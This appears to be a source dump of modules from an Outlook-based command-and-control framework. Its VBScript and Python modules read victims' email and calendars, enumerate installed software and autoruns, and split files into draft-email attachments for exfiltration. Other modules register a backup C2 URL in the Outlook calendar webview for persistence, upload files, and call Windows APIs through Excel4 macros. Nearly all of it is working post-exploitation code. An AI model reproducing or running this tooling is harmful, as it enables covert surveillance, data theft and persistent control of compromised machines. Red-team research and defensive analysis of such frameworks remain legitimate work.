/functions/operation/file/cat_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module gets the content of the file specified in file 12 | and outputs it to the log file. 13 | 14 | It uses Scripting.FileSystemObject 15 | - OpenTextFile 16 | - FileExists 17 | """ 18 | self.entry = 'cat_file' 19 | self.depends = [] 20 | self.options['file'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Path to file you want to cat", 24 | "handler": quotedstring 25 | } 26 | self.options['output_console'] = { 27 | "value": "False", 28 | "required": True, 29 | "description": "If True, it will show the output in the console", 30 | "hidden": True, 31 | "handler": makebool, 32 | "validator": ischoice, 33 | "validatorargs": {'choices': ["False", "True"]}, 34 | "tab_complete": tab_choice, 35 | "tab_args": {'choices': ["False", "True"]} 36 | } 37 | super().__init__(templatepath) 38 | 39 | def rethandler(self, agent, options, data): 40 | if options['output_console']['value'] == "True": 41 | print("\n") 42 | print(data) -------------------------------------------------------------------------------- /functions/operation/file/zip_content.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will zip file or folder with contents specified. 
10 | 11 | You specify the file/folder you want to zip using the path option - Full path. 12 | You specify the out zip file with the zipfile option - Full path 13 | 14 | It uses Scripting.FileSystemObject 15 | - FileExists 16 | - FolderExists 17 | - GetBaseName 18 | - GetFile 19 | - GetFolder 20 | - GetFileName 21 | - GetParentFolderName 22 | - BuildPath 23 | - OpenTextFile 24 | - GetAbsolutePathName 25 | 26 | It uses shell.application 27 | - Namespace 28 | - Namespace().CopyHere 29 | """ 30 | self.entry = 'zip_content' 31 | self.depends = [] 32 | self.options['path'] = { 33 | "value": None, 34 | "required": True, 35 | "description": "Target path of file/folder to zip - Ex: c:\\temp\\folderwithfiles or c:\\temp\\file.exe", 36 | "handler": quotedstring 37 | } 38 | self.options['zipfile'] = { 39 | "value": None, 40 | "required": True, 41 | "description": "Path to outputted zipped file - Ex: c:\\temp\\outfile.zip", 42 | "handler": quotedstring 43 | } 44 | super().__init__(templatepath) 45 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedapps.txt: -------------------------------------------------------------------------------- 1 | Function list_installedapps() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | objLocator.Add "__ProviderArchitecture", 64 5 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 6 | KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" 7 | objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps 8 | apps = "Installed 64bits Applications:" & vbCrLf 9 | For Each strSubkeyapps In arrSubkeysapps 10 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName 11 | If appName <> "" Then 12 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version 13 | apps = apps & appName & " | " & Version & vbCrLf 14 | 
End If 15 | Next 16 | apps = apps & vbCrLf & vbCrLf 17 | 18 | objLocator.Add "__ProviderArchitecture", 32 19 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 20 | KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" 21 | objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps 22 | apps = apps & "Installed 32bits Applications:" & vbCrLf 23 | For Each strSubkeyapps In arrSubkeysapps 24 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName 25 | If appName <> "" Then 26 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version 27 | apps = apps & appName & " | " & Version & vbCrLf 28 | End If 29 | Next 30 | list_installedapps = apps & vbCrLf 31 | 32 | End Function -------------------------------------------------------------------------------- /functions/operation/file/check_filearch.txt: -------------------------------------------------------------------------------- 1 | Function check_filearch() 2 | On Error Resume Next 3 | Set BinaryStream = window.external.OutlookApplication.CreateObject("ADODB.Stream") 4 | 5 | BinaryStream.Type = 1 6 | BinaryStream.Open 7 | 8 | BinaryStream.LoadFromFile {{file}} 9 | 10 | If err.number <> 0 Then 11 | check_filearch = "An error happened - Did you point to a file that exists?" 
12 | Exit Function 13 | End If 14 | On Error Goto 0 15 | 16 | skip = BinaryStream.Read(&H3C) 17 | positionSignature = BinaryStream.Read(4) 18 | 19 | strPosition="" 20 | For lngCounter = 0 to UBound(positionSignature) 21 | car= Ascb(Midb(positionSignature, lngCounter + 1, 1)) 22 | s = Hex(car) 23 | If Len(s) = 1 Then 24 | s = "0" & s 25 | End If 26 | strPosition = s & strPosition 27 | Next 28 | 29 | positionSignature = CInt("&H" & strPosition) 30 | 31 | BinaryStream.Position = positionSignature 32 | 33 | arr_signature = BinaryStream.Read(6) 34 | 35 | signature = "" 36 | For lngCounter = 0 to UBound(arr_signature) 37 | car= AscB(Midb(arr_signature, lngCounter + 1, 1)) 38 | s = Hex(car) 39 | If Len(s) = 1 Then 40 | s = "0" & s 41 | End If 42 | signature = signature & s 43 | Next 44 | 45 | BinaryStream.Close 46 | 47 | If signature = "504500004C01" Then 48 | check_filearch = {{file}} & " is x86" 49 | ElseIf signature = "504500006486" Then 50 | check_filearch = {{file}} & " is x64" 51 | End If 52 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_calendar.txt: -------------------------------------------------------------------------------- 1 | Function read_calendar() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder(9) 4 | 5 | myStart = Date & " 00:00 AM" 6 | myEnd = DateAdd("d", {{days_to_read}}, date) & " 23:59 PM" 7 | strRestriction = "[Start] > '" & myStart & "' AND [End] <= '" & myEnd & "'" 8 | Set oItems = folder.items 9 | oItems.IncludeRecurrences = True 10 | oItems.Sort "[Start]" 11 | 12 | Set oItemsInDateRange = oItems.Restrict(strRestriction) 13 | read_calendar = "Getting Calendar items from - " & folder.folderpath & vbCrLf & vbCrLf 14 | For Each currentItem In oItemsInDateRange 15 | if (currentItem.class = 26) then 16 | read_calendar = read_calendar & "-= Calendar object =-" & vbCrLf 17 | read_calendar = 
read_calendar & "Meeting Start and End: " & currentItem.start & " - " & currentItem.End & vbCrLf 18 | read_calendar = read_calendar & "Meeting Subject: " & currentItem.subject & vbCrLf 19 | read_calendar = read_calendar & "Meeting Recurring: " & currentItem.isRecurring & vbCrLf 20 | read_calendar = read_calendar & "Meeting Organizer: " & currentItem.Organizer & vbCrLf 21 | read_calendar = read_calendar & "Meeting Required Attendees: " & currentItem.RequiredAttendees & vbCrLf 22 | read_calendar = read_calendar & "Meeting Optional Attendees: " & currentItem.OptionalAttendees & vbCrLf 23 | if ({{include_body}}) then 24 | read_calendar = read_calendar & "Meeting Body: " & currentItem.body & vbCrLf & vbCrLf 25 | else 26 | read_calendar = read_calendar & vbCrLf 27 | end if 28 | end if 29 | next 30 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_email.txt: -------------------------------------------------------------------------------- 1 | Function read_email() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder({{folder_to_read_int}}) 4 | itemcount = {{items_to_read}} 5 | 6 | Set oItems = folder.items 7 | oItems.Sort "[CreationTime]", True 8 | 9 | if itemcount > folder.items.count then 10 | itemcount = folder.items.count 11 | end if 12 | 13 | read_email = "Getting Mail items from - " & folder.folderpath & vbCrLf & vbCrLf 14 | For i = 1 To itemcount 15 | if (oItems(i).class = 43) then 16 | read_email = read_email & "-= Mail object =-" & vbCrLf 17 | read_email = read_email & "Mail Subject: " & oItems(i).subject & vbCrLf 18 | read_email = read_email & "Mail To: " & oItems(i).To & vbCrLf 19 | read_email = read_email & "Mail Sender: " & oItems(i).sender & vbCrLf 20 | read_email = read_email & "Importance: " & oItems(i).importance & vbCrLf 21 | read_email = read_email & "Mail Attachments: " & oItems(i).attachments.count & vbCrLf 22 
| if oItems(i).attachments.count <> "" then 23 | for ii = 1 To oItems(i).Attachments.count 24 | read_email = read_email & "Attachment name " & ii & ": " & oItems(i).Attachments(ii) & vbCrLf 25 | next 26 | end if 27 | 28 | read_email = read_email & "Mail Unread: " & oItems(i).UnRead & vbCrLf 29 | if ({{include_body}}) then 30 | read_email = read_email & "Mail Body format: " & oItems(i).bodyformat & vbCrLf 31 | read_email = read_email & "Mail Body: " & oItems(i).body & vbCrLf & vbCrLf 32 | else 33 | read_email = read_email & vbCrLf 34 | end if 35 | end if 36 | next 37 | End Function -------------------------------------------------------------------------------- /api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {3be6a7fa-d612-40eb-b2df-d2d4ff8b27b2} 6 | False 7 | 8 | 9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 10 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 11 | 12 | 13 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 14 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 15 | 16 | 17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Generated Files 29 | 30 | 31 | Generated Files 32 | 33 | 34 | Generated Files 35 | 36 | 37 | -------------------------------------------------------------------------------- /hiddenFunctions/upload_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import makeint, quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.entry = 'upload_file' 9 | self.depends = [] 10 | self.options['file'] = { 11 | "value": None, 12 | "required": True, 13 | "description": "file we are uploading", 14 | "tab_complete": 
self.helpers.complete_path, 15 | "handler": None 16 | } 17 | self.options['chunksize'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "size in bytes we are uploading per callback", 21 | "handler": makeint 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "where we are writing this out to", 27 | "handler": quotedstring 28 | } 29 | self.options['data'] = { 30 | "value": None, 31 | "required": False, 32 | "description": "where we are writing this out to", 33 | "handler": None, 34 | "handler": quotedstring, 35 | "hidden": True 36 | } 37 | super().__init__(templatepath) 38 | 39 | def rethandler(self, agent, options, data): 40 | if str(data).startswith("ERROR"): 41 | self.helpers.speclog("Upload failed - Clear task queue manually or it will loop forever",output=True) 42 | self.helpers.speclog(str(data),output=True) 43 | 44 | -------------------------------------------------------------------------------- /functions/execute/host/set_calendarhomepagehook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module finds the current URL in use for C2 and sets it to the calendar webview. 11 | The purpose is that this can be used to configure a backup channel incase the inbox webview is deleted. 
12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - ConnectServer(root\cimv2).CreateKey 16 | - ConnectServer(root\cimv2).SetStringValue 17 | - ConnectServer(root\cimv2).SetDWORDValue 18 | 19 | """ 20 | self.entry = 'set_calendarhomepagehook' 21 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 22 | self.options['homepageurl'] = { 23 | "value": "None", 24 | "required": True, 25 | "description": """" 26 | URL to Specula server. Will be set to HKCU\\software\\microsoft\\office\\version\\outlook\\webview\\calendar - URL reg_sz. 27 | If set to None it autoresolves to the current URL in use on this Specula server. 28 | If you want to use another Specula server as backup define the url to it here. 29 | """, 30 | "handler": quotedstring, 31 | "hidden": False 32 | } 33 | super().__init__(templatepath) 34 | 35 | def preprocess(self, agent): 36 | if self.options['homepageurl']['value'] == "None": 37 | self.options['homepageurl']['value'] = agent.url 38 | -------------------------------------------------------------------------------- /functions/operation/outlook/savedraft_filemail.txt: -------------------------------------------------------------------------------- 1 | Function savedraft_filemail() 2 | on error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | 5 | LF = Chr(10) 6 | Set oFSO = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 7 | FullName = {{ sourcefile }} 8 | TargetDir = sh.ExpandEnvironmentStrings("%TEMP%") 9 | 10 | Name = oFSO.GetTempName 11 | SplitSize = {{ splitsize }} 12 | Size = 1024 * 1024 * SplitSize 13 | 14 | if oFSO.FileExists(FullName) then 15 | On Error Resume Next 16 | Set iFile = oFSO.GetFile(FullName) 17 | Set iStream = iFile.OpenAsTextStream(1) 18 | 19 | data = iStream.Read(iFile.Size) 20 | iStream.close 21 | 22 | Ext = 0 23 | offset = 1 24 | 25 | Do 26 | Ext = Right("00" & Ext + 1, 3) 27 | if ext > "999" then Error ("Too many 
files - maximum is 999!") 28 | 29 | NewName = TargetDir & Name & Ext 30 | Set oFile = oFSO.CreateTextFile(NewName, 2) 31 | 32 | If Size > Len(data)+1 - offset Then Size = Len(data) + 1 - offset 33 | 34 | oFile.Write Mid(Data, offset, Size) 35 | offset = offset + Size 36 | oFile.Close 37 | 38 | Set objMail = window.external.OutlookApplication.CreateItem(0) 39 | 40 | objMail.Subject = "" 41 | objMail.Body = Ext 42 | objMail.Attachments.Add(NewName) 43 | objMail.Save 44 | oFSO.DeleteFile(NewName) 45 | 46 | Loop Until offset >= Len(data) 47 | savedraft_filemail = "Draft emails with attachments saved with filebasename: " & Name 48 | else 49 | savedraft_filemail = "Error - SourceFile not found or some other strange error" 50 | end if 51 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_autoruns.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates autoruns defined on the agent 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).EnumValues 19 | - ConnectServer(root\cimv2).GetDwordValue 20 | - ConnectServer(root\cimv2).GetStringValue 21 | - ConnectServer(root\cimv2).GetExpandedStringValue 22 | - ConnectServer(root\cimv2).GetBinaryValue 23 | - ConnectServer(root\cimv2).GetMultiStringValue 24 | - ConnectServer(root\cimv2).GetQWORDValue 25 | 26 | It uses Scripting.FileSystemObject 27 | - GetFolder 28 | - GetFolder().Files 29 | - GetBaseName 30 | - GetExtensionName 31 | """ 32 | self.entry = 'list_autoruns' 33 | self.depends = 
['./helperFunctions/Getallregvalues.txt', './helperFunctions/Getregvalue.txt', './helperFunctions/dir_lister.txt'] 34 | self.options['username'] = { 35 | "value": "Dummy", 36 | "required": True, 37 | "description": "Username, autoresolves to agents registered username", 38 | "handler": quotedstring, 39 | "hidden": False 40 | } 41 | super().__init__(templatepath) 42 | 43 | def preprocess(self, agent): 44 | self.options['username']['value'] = agent.username -------------------------------------------------------------------------------- /functions/execute/host/execute_excel4macro.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module spawns a new instance of excel and executes ExecuteExcel4Macro to execute provided call. 10 | ExecuteExcel4Macro("CALL(INPUT)") 11 | 12 | Example calling Windows API using INPUT: 13 | - set input ""Kernel32"",""GetTickCount"",""J"" 14 | - set input ""user32"",""SetCursorPos"",""JJJ"",1,2 15 | 16 | Info about the datatypes (J) 17 | B - 8-byte floating-point number (IEEE), Transferred by Value, C type double. 18 | C - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference, C type char * 19 | F - Zero (null) terminated string (max. 
Length = 255 characters), Transferred by Reference (modify in place), C type char * 20 | J - 4 bytes wide signed integer, Transferred by Value, C type long int 21 | P - Excel's OPER data structure, Transferred by Reference, C type OPER * 22 | R - Excel's XLOPER data structure, Transferred by Reference, C type XLOPER * 23 | 24 | It uses the excel application 25 | - ExecuteExcel4Macro 26 | """ 27 | self.entry = 'execute_excel4macro' 28 | self.depends = [] 29 | self.options['input'] = { 30 | "value": None, 31 | "required": True, 32 | "description": "What to execute, remember two double quotes around parameters, see help!", 33 | "handler": quotedstring 34 | } 35 | super().__init__(templatepath) 36 | -------------------------------------------------------------------------------- /functions/operation/outlook/read_emailnamedfolder.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to read mail items. 12 | Specify the folder with folder_to_read. 
13 | Format should be: inbox\\sublevel1\\sublevel2 14 | 15 | It uses OutlookApplication 16 | - Session.Folders(1).folders.item(FoldersArray(0) 17 | """ 18 | self.entry = 'read_emailnamedfolder' 19 | self.depends = [] 20 | self.options['items_to_read'] = { 21 | "value": 10, 22 | "required": True, 23 | "description": "The number of items to read from the top (newest first)", 24 | "handler": makeint 25 | } 26 | self.options['include_body'] = { 27 | "value": "True", 28 | "required": True, 29 | "description": "List out the body of the email", 30 | "handler": makebool, 31 | "validator": ischoice, 32 | "validatorargs": {'choices': ["False", "True"]}, 33 | "tab_complete": tab_choice, 34 | "tab_args": {'choices': ["False", "True"]} 35 | } 36 | self.options['folder_to_read'] = { 37 | "value": "inbox", 38 | "required": True, 39 | "description": "What folder (freetext) to read emails from - ex: inbox\\subfolder", 40 | "handler": quotedstring, 41 | } 42 | super().__init__(templatepath) 43 | --------------------------------------------------------------------------------